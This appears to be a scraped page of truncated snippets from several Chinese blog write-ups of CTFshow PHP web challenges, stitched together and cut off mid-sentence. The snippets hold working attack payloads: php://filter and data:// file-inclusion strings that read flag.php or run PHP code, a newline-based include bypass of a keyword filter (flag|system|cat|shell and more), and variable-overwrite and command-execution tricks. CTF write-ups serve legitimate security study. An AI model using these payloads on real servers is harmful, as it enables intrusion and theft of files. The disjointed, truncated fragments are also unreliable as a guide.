web100Copyhighlight_file(__FILE__); include("ctfshow.php"); //flag in class ctfshow; $ctfshow = new ctfshow(); $v1=$_GET['v1']; $v2=$_GET['v2']; $v3=$_GET['v3']; $v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3); if($v0){ if(!preg_match("/\;...
web150plus 这个题一点点小坑__autoload()函数不是类里面的__autoload — 尝试加载未定义的类最后构造?..CTFSHOW..=phpinfo就可以看到phpinfo信息啦原因是..CTFSHOW..解析变量成__CTFSHOW__然后进行了变量覆盖,因为CTFSHOW是类就会使用__autoload()函数方法,去加载,因为等于phpinfo就会去加载phpinfo接下来就去get...
web 150_plus 看了一眼,再见 ?..CTFSHOW..=phpinfo 虽说题解是这样的,但考察的不是这个知识点,等我后面有机会了再看 别问最后两道题呢,咕咕咕~ __EOF__ 本文作者:Solitude 本文链接:https://www.cnblogs.com/solitude0-c/p/17584390.html关于博主:评论和私信会在第一时间回复。或者直接私信我。版权...
Web150_Plus<?php include("flag.php"); error_reporting(0); highlight_file(__FILE__);class CTFSHOW{ private $username; private $password; private $vip; private $secret;function __construct(){$this->vip = 0;$this->secret = $flag; }...
CTFshow PHP web133 hint:ctfshow web133和其他命令执行的骚操作_Firebasky的博客-CSDN博客 考点:命令执行的骚操作和curl -F的使用 @:防止报错 substr($F,0,6):截断得前六个字符 如果只能有6个字符的话,执行命令确实不可能。 看一个骚一点的例子: 确实sleep了 ...
1.web89 intval函数的利用,intval函数获取变量的整数值,失败时返回0,空的数组返回,非空数组返回1 num[]=1 intval ( mixed $var [, int $base = 10 ] ) : int Note: 如果 base 是 0,通过检测 var 的格式来决定使用
web 32过滤了: flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\( 这里考虑:利用文件包含以及伪协议读取?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php这里伪协议的意思是,php://filter(过滤器)/convert.base64-encode(base64编码的过滤器)/resource=flag....
62方法plus++ pro 一步到位:post c=include(scandir('./')[2]);var_dump(get_defined_vars()); print_r和var_dump虽然有区别,由于我们这里的都是一些简单的字符串,所以没啥影响 魔改: 日志包含:这里建议去看看群主的方法B站里面 web 64 哈哈哈,白嫖62方法 ...
web37 <?phperror_reporting(0);if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/flag/i",$c)){include($c);echo$flag;}}else{highlight_file(__FILE__);} 文件包含漏洞,可以直接文件包含代码执行:data:text/plain,<?php 你想要执行的代码?> ...
CTFSHOW WEB入门 PHP特性篇 web89 AI检测代码解析 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 15:38:51 # @email: h1xa@...